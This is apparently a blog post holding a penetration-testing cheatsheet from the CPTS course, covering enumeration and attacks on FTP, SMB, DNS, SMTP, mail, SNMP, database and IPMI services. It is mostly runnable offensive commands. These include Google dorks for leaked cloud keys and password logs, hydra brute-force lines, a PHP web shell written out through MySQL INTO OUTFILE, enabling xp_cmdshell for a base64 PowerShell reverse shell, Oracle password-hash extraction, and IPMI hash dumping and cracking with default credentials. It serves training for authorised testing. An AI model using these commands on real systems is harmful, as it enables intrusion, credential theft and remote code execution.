Footprinting theory + cheatsheet
Footprinting common services
Footprinting common services
This post covers footprinting techniques from the CPTS course along with my cheatsheet for common enumeration methods.
Infrastructure Based Enumeration
Domain Information
Finding Valid Subdomains
1
openssl s_client -connect example.com:443 -showcerts
https://crt.sh/
crt.sh is a public database of SSL certificates. You can search for a domain to see all associated subdomains.
View results in JSON
1
-s https://crt.sh/\?q\=example.com\&output\=json | jq .
Using Nmap and NSE to retrieve ssl information
1
nmap --script ssl-cert -p 443 example.com
Querying DNS records
1
dig any inlanefreight.com
DNS record types:
- A Record (Address Record) – Maps a domain name to an IPv4 address so computers know where to find a website.
- MX Record (Mail Exchange) – Specifies which mail servers handle email for a domain.
- NS Record (Name Server) – Points to the DNS servers responsible for managing a domain’s records.
- TXT Record (Text Record) – Stores extra information, often for verification (e.g., SPF for email security or site ownership proof).
Cloud Resources
Google dorks for finding Cloud resources
AWS S3 Buckets
1
2
site:s3.amazonaws.com "companyname"
inurl:".s3.amazonaws.com" filetype:xml
Azure Blob Storage
1
site:blob.core.windows.net "companyname"
Google Cloud Storage (GCS) Buckets
1
site:storage.googleapis.com "companyname"
Publicly Indexed Environment Files (May Contain Cloud Keys)
1
filetype:env "AWS_ACCESS_KEY_ID" OR "AZURE_STORAGE_KEY" OR "GOOGLE_CLOUD_PROJECT"
Exposed Log Files
1
filetype:log "password" OR "secret"
Third party tools for enumerating Cloud resources
https://domain.glass/
Domain.glass is a tool that aggregates DNS records and subdomains
https://buckets.grayhatwarfare.com/
GrayHatWarfare is a search engine that indexes publicly exposed cloud storage buckets from AWS, Azure, and GCP. It can be used to find files left open to the internet.
Host Based Enumeration
FTP - File Transfer Protocol - Port 21
1
ftp <IP>
Enter anonymous when prompted for Username to login anonymously (if anonymous login is enabled).
Recursive listing
1
ftp> ls -R
Download file
1
ftp> get <filename>
Upload file
1
ftp> put <filename>
Exit
1
ftp> exit
Download All Available Files
1
wget -m --no-passive ftp://username:password@<IP>
If the password has special characters (@, :, !, etc.), URL-encode them.
Use debug/trace for detailed output
Debug
1
ftp> debug
Trace
1
ftp> trace
Using nmap scipts
1
locate *.nse | grep ftp
Using these scripts
1
nmap --script "ftp-*" -p 21 <IP>
Interacting with FTP with TLS/SSL enabled
1
openssl s_client -connect 10.129.14.136:21 -starttls ftp
SMB - Server Message Block - Port 445 / 139
Enumerating shares
1
smbclient -N -L //<IP>
Connecting to share
1
smbclient //<IP>/<sharename>
list files
1
smb: \> ls
download file
1
smb: \> get <filename>
Using nmap scipts
1
locate *.nse | grep smb
Using these scripts
1
nmap --script "smb-*" -p 21 <IP>
Using rpcclient for enumeration. -U “” is for null authentication. Enter username if credentials are available.
1
rpcclient -U "" <IP>
RPCClient - Server Information
1
rpcclient $> srvinfo
RPCClient - Enumerate domains on the network
1
rpcclient $> enumdomains
RPCClient - Get domain, server and user information
1
rpcclient $> querydominfo
RPCClient - Enumerate all shares
1
rpcclient $> netshareenumall
RPCClient - Get information about a specific share
1
rpcclient $> netsharegetinfo <share>
RPCClient - Enumerate domain users
1
rpcclient $> enumdomusers
RPCClient - Query a specific user
1
rpcclient $> queryuser <RID>
RPCClient - Query a specific group
1
rpcclient $> querygroup <>
Brute Forcing User RIDs with script
1
for i in $(seq 500 1100);do rpcclient -N -U "" <IP> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
Brute Forcing User RIDs with Impacket
1
samrdump.py <IP>
Enumeration with SMBmap
1
smbmap -H <IP>
Using Enum4Linux-ng
1
./enum4linux-ng.py <IP> -A
Using NetExec
Enumerating shares
1
nxc smb <IP> -u '' -p '' --shares
Enumerating users through RID Bruteforcing
1
nxc smb <IP> -u '' -p '' --rid-brute
Enumerating Password policy
1
nxc smb <IP> -u '' -p '' --pass-pol
Enumerating Local groups
1
nxc smb <IP> -u '' -p '' --local-group
NFS - Network File Share - Port 111 / 2049
Using nmap scipts
1
locate *.nse | grep nfs
Using these scripts
1
sudo nmap --script nfs* <IP> -sV -p111,2049
Show available NFS Share
1
showmount -e <IP>
Mounting NFS Share
1
2
3
mkdir target-NFS
sudo mount -t nfs <IP>:/ ./target-NFS/ -o nolock
cd target-NFS
-o nolock is used to prevent issues with NFS file locking in certain environments.
List Contents with Usernames & Group Names
1
ls -l target-NFS/
List Contents with UIDs & GUIDs
1
ls -n target-NFS/
Unmounting file share
1
2
cd ..
sudo umount ./target-NFS
DNS - Domain Name System - Port 53
Domain Name System (DNS) is responsible for mapping domain names to IP addresses. It consists of several server types:
| Server Type | Description |
|---|---|
| DNS Root Server | Handles top-level domains (TLDs), last-resort query resolution. |
| Authoritative Nameserver | Holds the official records for a specific domain. |
| Non-authoritative Nameserver | Caches DNS records from authoritative sources. |
| Caching DNS Server | Temporarily stores DNS query results. |
| Forwarding Server | Passes queries to another DNS server. |
| Resolver | Resolves DNS queries locally (in routers, computers, etc.). |
Common DNS Record Types
| DNS Record | Description |
|---|---|
| A | Maps a domain to an IPv4 address. |
| AAAA | Maps a domain to an IPv6 address. |
| MX | Specifies mail servers for the domain. |
| NS | Identifies name servers for a domain. |
| TXT | Stores arbitrary text data (e.g., SPF, DKIM, DMARC validation). |
| CNAME | Creates an alias for another domain name. |
| PTR | Reverse lookup: maps an IP to a domain name. |
| SOA | Contains zone information and admin email. |
DNS Enumeration Commands
Find Name Servers
1
2
dig ns <target-domain>
host -t ns <target-domain>
Retrieve All DNS Records
1
2
dig any <target-domain>
host -a <target-domain>
Enumerate a Specific Record Type
1
2
dig <record-type> <target-domain>
host -t <record-type> <target-domain>
Examples:
1
2
3
dig mx example.com # Find mail servers
dig txt example.com # Find TXT records
dig soa example.com # Find SOA record
Reverse Lookup (PTR Record)
1
2
dig -x <IP>
host <IP>
Perform Zone Transfer (AXFR)
1
dig axfr <target-domain> @<dns-server>
Find Subdomains via Certificate Transparency Logs
1
-s "https://crt.sh/?q=<target-domain>&output=json" | jq .
Brute-Force Subdomains
Using SecLists:
1
2
3
for sub in $(cat /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt); do
dig $sub.<target-domain> @<dns-server> | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt
done
Using dnsenum:
1
dnsenum --dnsserver <dns-server> --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/seclists/Discovery/DNS/subdomains-top1million-110000.txt <target-domain>
DNS Enumeration with Nmap
Locate DNS NSE Scripts
1
locate *.nse | grep dns
Run DNS Enumeration Scripts
1
nmap --script "dns-*" -p 53 <target-domain>
SMTP - Simple Mail Transfer Protocol - Port 25 / 465 / 587
Understanding SMTP
Simple Mail Transfer Protocol (SMTP) is used for sending emails between clients and servers. It operates mainly on the following ports:
| Port | Usage |
|---|---|
| 25 | Default SMTP port (often blocked for outbound mail). |
| 465 | Secure SMTP (SMTPS) using SSL/TLS encryption. |
| 587 | SMTP with STARTTLS (modern encryption standard). |
SMTP is often used in combination with POP3 (Port 110) or IMAP (Port 143) to receive emails.
Common SMTP Commands
| Command | Description |
|---|---|
| HELO/EHLO | Initiates a session with the SMTP server. |
| MAIL FROM | Specifies the sender’s email address. |
| RCPT TO | Specifies the recipient’s email address. |
| DATA | Signals the start of email body transmission. |
| VRFY | Checks if an email address exists (User Enumeration). |
| EXPN | Expands a mailing list to show all recipients. |
| RSET | Aborts the current email transaction. |
| NOOP | Keeps the connection open without performing any action. |
| QUIT | Terminates the session. |
Note: Many modern SMTP servers disable VRFY and EXPN due to security concerns. If disabled, consider alternative enumeration techniques (e.g., brute-force or metadata analysis).
SMTP Enumeration Commands
Banner Grabbing
1
2
nc -nv <IP> 25
telnet <IP> 25
- Reveals the SMTP server version and potential misconfigurations.
Example Output:
1
220 mail.example.com ESMTP Postfix
Find Available SMTP Commands
1
ehlo example.com
- Lists supported commands like
VRFY,EXPN,STARTTLS, etc.
Enumerate Valid Users Using VRFY (If Allowed)
1
2
3
vrfy root
vrfy admin
vrfy user123
- If the user exists, the server responds with “252 2.0.0
".
Using EXPN (Expands Mailing Lists)
1
2
3
expn admin
expn users
expn mailinglist
- May return a full list of emails if enabled.
Brute-Force User Enumeration with SMTP
1
2
3
for user in $(cat users.txt); do
echo "VRFY $user" | nc -nv <IP> 25;
done
Sending Emails via SMTP Connect to SMTP Server
1
telnet <IP> 25
Start a Mail Session
1
2
3
4
HELO example.com
MAIL FROM: <attacker@example.com>
RCPT TO: <victim@example.com>
DATA
Write and Send Email
1
2
3
4
5
Subject: Test Email
This is a test email sent via SMTP enumeration.
.
QUIT
- The
.(dot) on a new line signifies the end of the message.
Checking for Open Relays (Misconfigurations)
An open relay allows anyone to send emails without authentication, often leading to spam and phishing attacks.
Test Open Relay with Telnet
1
2
3
4
5
6
7
8
MAIL FROM: <attacker@example.com>
RCPT TO: <victim@anydomain.com>
DATA
Subject: Open Relay Test
This is a test email.
.
QUIT
- If accepted, the server is an open relay, allowing unauthorized emails.
Use Nmap to Check for Open Relay
1
nmap --script smtp-open-relay -p 25 <IP>
Example Output:
1
smtp-open-relay: Server is an open relay (16/16 tests)
Locate SMTP NSE Scripts
1
locate *.nse | grep smtp
Run Common SMTP Enumeration Scripts
1
nmap --script "smtp-*" -p 25,465,587 <IP>
Using SMTP User Enum
1
smtp-user-enum -M VRFY -U users.txt -t <IP>
If VRFY is disabled, hydra can be used to brute-force credentials.
1
hydra -L users.txt -P passwords.txt -s 25 -S <IP> smtp
IMAP / POP3 - Internet Message Access Protocol - Post Office Protocol - Port 143 / 993 / 110 / 995
Understanding IMAP & POP3
IMAP (Internet Message Access Protocol) and POP3 (Post Office Protocol) are used to retrieve emails from a mail server.
| Protocol | Port | Usage |
|---|---|---|
| IMAP | 143 | Retrieves emails while keeping them on the server. |
| IMAPS (IMAP Secure) | 993 | IMAP over SSL/TLS encryption. |
| POP3 | 110 | Retrieves emails and removes them from the server. |
| POP3S (POP3 Secure) | 995 | POP3 over SSL/TLS encryption. |
Common IMAP Commands
| Command | Description |
|---|---|
1 LOGIN <username> <password> | Authenticates the user. |
1 LIST "" * | Lists all available mail directories. |
1 CREATE "INBOX" | Creates a new mailbox. |
1 DELETE "INBOX" | Deletes a mailbox. |
1 SELECT INBOX | Selects a mailbox for reading messages. |
1 FETCH <ID> all | Retrieves all data associated with an email message. |
1 CLOSE | Removes all messages marked as deleted. |
1 LOGOUT | Terminates the session with the IMAP server. |
Common POP3 Commands
| Command | Description |
|---|---|
USER <username> | Identifies the user. |
PASS <password> | Authenticates the user. |
STAT | Displays the number of emails in the mailbox. |
LIST | Lists all emails with their size. |
RETR <ID> | Retrieves an email message by ID. |
DELE <ID> | Deletes an email by ID. |
RSET | Resets the mailbox state. |
QUIT | Terminates the session with the POP3 server. |
IMAP & POP3 Enumeration Commands
Scan for IMAP & POP3 Services
1
nmap -sV -p110,143,993,995 <IP>
- Detects Dovecot, Exchange, or other mail services.
- Shows SSL certificates and mail server details.
Extract IMAP/POP3 Capabilities
1
2
openssl s_client -connect <IP>:143 -starttls imap
openssl s_client -connect <IP>:110 -starttls pop3
- Reveals supported authentication mechanisms.
- Shows TLS/SSL configurations.
Brute-Force IMAP & POP3 Credentials Using hydra:
1
2
hydra -L users.txt -P passwords.txt imap://<IP> -V
hydra -L users.txt -P passwords.txt pop3://<IP> -V
- Attempts to log in using username/password lists.
Access Mailbox with ``
1
-k 'imaps://<IP>' --user <user>:<password>
or
1
-k --url "imaps://<IP>/INBOX" --user <user>:<password>
- Lists email folders upon successful authentication.
Enumerate Mailbox via IMAP
1
openssl s_client -connect <IP>:993
Then interact using:
1
2
3
4
1 LOGIN <user> <password>
1 LIST "" *
1 SELECT INBOX
1 FETCH 1 all
- Fetches email messages and metadata.
Enumerate Mailbox via POP3
1
openssl s_client -connect <IP>:995
Then interact using:
1
2
3
4
5
USER <user>
PASS <password>
STAT
LIST
RETR 1
- Retrieves email content from the server.
Using Nmap Scripts for IMAP and POP3
1
2
locate *.nse | grep imap
locate *.nse | grep pop3
1
2
nmap --script "imap-*" -p 143,993 <IP>
nmap --script "pop3-*" -p 110,995 <IP>
SNMP - Simple Network Management Protocol - Port 161 / 162
Understanding SNMP
Simple Network Management Protocol (SNMP) is used for monitoring and managing network devices like routers, switches, servers, and IoT devices.
It operates on:
- UDP 161 for requests.
- UDP 162 for receiving SNMP traps (unsolicited alerts from devices).
Discover SNMP Services
1
nmap -sU -p 161 --script=snmp-info <IP>
Extract SNMP System Information (Default Community Strings). Retrieves system info, usernames, installed software, and more.
1
2
snmpwalk -v2c -c public <IP>
snmpwalk -v1 -c public <IP>
Bruteforce Community Strings
1
onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt <IP>
Query a Specific OID
1
snmpget -v2c -c public <IP> .1.3.6.1.2.1.1.1.0
Enumerate SNMP Users (SNMPv3)
1
snmpwalk -v3 -u <username> -l authPriv -A <password> -X <encryption_key> -a SHA -x AES <IP>
Extract Running Processes, Dump Installed Software, Extracts local user accounts
1
snmpwalk -v2c -c public <IP> .1.3.6.1.2.1.25.4.2.1.2
Brute-Force SNMP OIDs
1
braa public@<IP>:.1.3.6.*
Using Nmap scrips
1
locate *.nse | grep snmp
1
nmap --script "snmp-*" -p 161 <IP>
MySQL - Relational Database Management System - Port 3306
Using nmap scripts
1
sudo nmap <IP> -sV -sC -p3306 --script mysql*
Connect to mysql
1
mysql -u <Username> -p<Password> -h <IP>
See available databases
1
MySQL [(none)]> show databases;
See DB Version
1
MySQL [(none)]> select version();
Select database
1
SQL [(none)]> use mysql;
Enumerate tables
1
MySQL [mysql]> show tables;
Enumerate tables
1
MySQL [mysql]> show tables;
Show columns in a selected dataset
1
MySQL [mysql]> show columns from <table>;
Show all information in a table
1
MySQL [mysql]> select * from <table>;
Search for needed string in the desired table.
1
MySQL [mysql]> select * from <table> where <column> = "<string>";
Bruteforcing credentials with hydra
1
hydra -L users.txt -P passwords.txt -s 3306 -f <IP> mysql
If we have file write permissions, we can drop a PHP shell:
1
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
MSSQL - Microsoft SQL Server - Port 1433
Scanning for MSSQL Services
1
nmap -p 1433 --script ms-sql-* <IP>
If you have valid credentials, you can connect and enumerate the databases:
1
python3 mssqlclient.py <Username>:<password>@<IP>
List databases after connecting:
1
SQL> select name from sys.databases;
Check current user privileges:
1
2
3
4
SELECT IS_SRVROLEMEMBER('sysadmin'); -- Check if user is sysadmin
SELECT IS_SRVROLEMEMBER('db_owner'); -- Check if user is database owner
SELECT IS_SRVROLEMEMBER('db_datareader'); -- Check if user can read all tables
SELECT IS_SRVROLEMEMBER('db_datawriter'); -- Check if user can modify data
If 1 is returned, you have the respective privilege.
If xp_cmdshell is enabled, you can execute system commands:
1
EXEC xp_cmdshell 'whoami';
If xp_cmdshell is disabled, we can enable it:
1
2
3
4
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Basic MSSQL Enumeration
List all databases
1
SELECT name FROM master.sys.databases;
Switch to a database
1
USE <database_name>;
List all tables in the current database
1
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES;
List all columns in a specific table
1
SELECT COLUMN_NAME, DATA_TYPE FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'Users';
List all stored procedures
1
SELECT name FROM sys.procedures;
Check MSSQL version
1
SELECT @@VERSION;
Revshell from xp_cmdshell Get Base64 payload from http://revshells.com/
1
EXEC xp_cmdshell 'powershell -enc BASE64_PAYLOAD';
Oracle TNS - Transparent Network Substrate - Port 1521
Scanning for Oracle TNS Services
1
nmap -p 1521 --script oracle-tns-version <IP>
Brute-force Oracle SIDs:
1
nmap --script oracle-sid-brute -p 1521 <IP>
Scan for known vulnerabilities:
1
nmap -p 1521 --script oracle-vuln-* <IP>
Oracle Enumeration with ODAT
ODAT (Oracle Database Attacking Tool) is useful for enumeration and exploitation.
1
2
3
git clone https://github.com/quentinhardy/odat.git
cd odat/
pip3 install -r requirements.txt
Check if the target is properly configured:
1
./odat.py all -s <IP>
Find valid credentials:
1
./odat.py passwordguesser -s <IP> -d XE -U users.txt -P passlist.txt
Brute-forcing Oracle Credentials
Using Hydra:
1
hydra -L users.txt -P passwords.txt <IP> oracle-listener
Connecting to Oracle Database
Using SQLPlus:
1
sqlplus <username>/<password>@<IP>/<SID>
Example:
1
sqlplus <USERNAME>/<PASSWORD>@<TARGET_IP>/<DATABASE_SID>
Connecting as SYSDBA:
1
sqlplus <USERNAME>/<PASSWORD>@<TARGET_IP>/<DATABASE_SID> as sysdba
Enumerate Database Information
List databases:
1
SELECT name FROM v$database;
List tables in current database:
1
SELECT table_name FROM all_tables;
List user privileges:
1
SELECT * FROM user_role_privs;
Extract password hashes:
1
SELECT name, password FROM sys.user$;
Exploiting Oracle Database
Uploading a File to the Server
Upload a test file:
1
2
echo "Test Upload" > test.txt
./odat.py utlfile -s <IP> -d XE -U <username> -P <password> --sysdba --putFile C:\\inetpub\\wwwroot test.txt ./test.txt
Check if file upload was successful:
1
curl -X GET http://<IP>/test.txt
IPMI - Intelligent Platform Management Interface - Port 623
Scanning for IPMI Services
1
nmap -sU -p 623 --script ipmi-* <IP>
Using Metasploit:
1
2
3
use auxiliary/scanner/ipmi/ipmi_version
set rhosts <IP>
run
Default Credentials to Try
| Product | Username | Password |
|---|---|---|
| Dell iDRAC | root | calvin |
| HP iLO | Administrator | 8-character random string |
| Supermicro IPMI | ADMIN | ADMIN |
Bruteforce IPMI Credentials
1
hydra -L users.txt -P passwords.txt <IP> ipmi -V
Dumping IPMI Password Hashes
Using Metasploit:
1
2
3
use auxiliary/scanner/ipmi/ipmi_dumphashes
set rhosts <IP>
run
Cracking IPMI Hashes with Hashcat
1
hashcat -m 7300 ipmi_hashes.txt rockyou.txt --force